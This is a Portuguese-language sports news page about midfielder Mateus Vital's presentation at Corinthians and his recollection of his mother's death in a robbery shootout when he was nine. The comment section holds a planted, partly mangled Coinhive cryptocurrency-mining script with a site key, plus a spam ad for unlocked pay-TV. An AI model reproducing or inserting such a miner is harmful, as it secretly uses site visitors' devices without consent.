19/1/2018 09:30

Na chegada ao Corinthians, Mateus Vital lembra tragédia familiar aos nove anos: 'Passa um filme forte'

Na chegada ao Corinthians, Mateus Vital lembra tragédia familiar aos nove anos: 'Passa um filme forte'
O ano de 2007 marca a vida de Mateus Vital. O meio-campista, apresentado ontem como jogador do Corinthians, perdeu a mãe quando tinha apenas nove anos, quando voltava de um treino e, ao chegar ao novo clube, relembrou o drama vivido, “um filme forte” que passa em sua cabeça.



“Comecei no Vasco com cinco anos e, aos nove, perdi minha mãe voltando de um treinamento, foi um baque na minha vida. Se eu disser que não pensei em parar de jogar futebol, seria mentira. Pensei em parar, mas meu pai foi um herói, com as minhas irmãs, me ajudaram muito”, disse.

A tragédia aconteceu quando Vital retornava de um treino de futsal do Vasco, em uma tentativa de assalto no Rio de Janeiro. A mãe do jogador deixou o carro para argumentar com os bandidos e acabou atingida em meio a uma troca de tiros, após a aproximação de uma viatura policial.

Além de Vital e da mãe, também estavam no carro seu pai, um irmão e um amigo, que não se feriram. Assim como naquela ocasião dramática, o pai do jovem também esteve ao seu lado nesta quinta, dia do primeiro treino e apresentação do meio-campista no Corinthians.

“Não tenho nem o que falar desse cara fenomenal, herói, supriu minhas necessidades com minhas irmãs. Só tenho que agradecer. Tenho certeza que minha mãe está orgulhosa”, afirmou.

Foi esse episódio também que fez com que Matheus adotasse também o Vital, sobrenome de sua mãe. Antes, ele era conhecido como “Pet”, em referência à semelhança com o sérvio Petkovic.

“Como subi para o profissional com esse nome, o pessoal estava comparando muito. Tomei a decisão coma família, até para homenagear minha mãe, ficou melhor. Sou o Mateus, o Pet é o Pet. Mas qualquer nome que levar na camisa quero mostrar meu melhor, meu futebol.”

Na chegada ao Corinthians, aliás, Vital também não esqueceu o Vasco, clube que não escondeu o carinho por ter lhe ajudado na infância a superar o drama da perda da mãe.

“O Vasco foi do caramba, esteve ao meu lado a todo momento. Colocou uma psicóloga comigo quase 24h. Claro que ao chegar em um clube como o Corinthians passa um filme forte, foi o momento mais difícil da minha vida. Mas agora é deixar isso de lado, focar em jogar futebol.”


VEJA TAMBÉM
- Timão escalado para o jogo contra o Argentinos Juniors
- Reserva do Corinthians, Carlos Miguel é sondado por clubes do Brasil e da Europa
- Timão escalado para o jogo contra o Juventude









10623 visitas - Fonte: ESPN

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

andres sanche e a nossa esperanc porque est diretoria so fala mais nao contrat

vai ser feliz aqui no Corinthians Boa sorte seja bem-vindo Vital

vai ser feliz aqui no Corinthians boa sorte

é força fé que vc dara muitas alegrias para fiel
é nois vai Corinthians

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade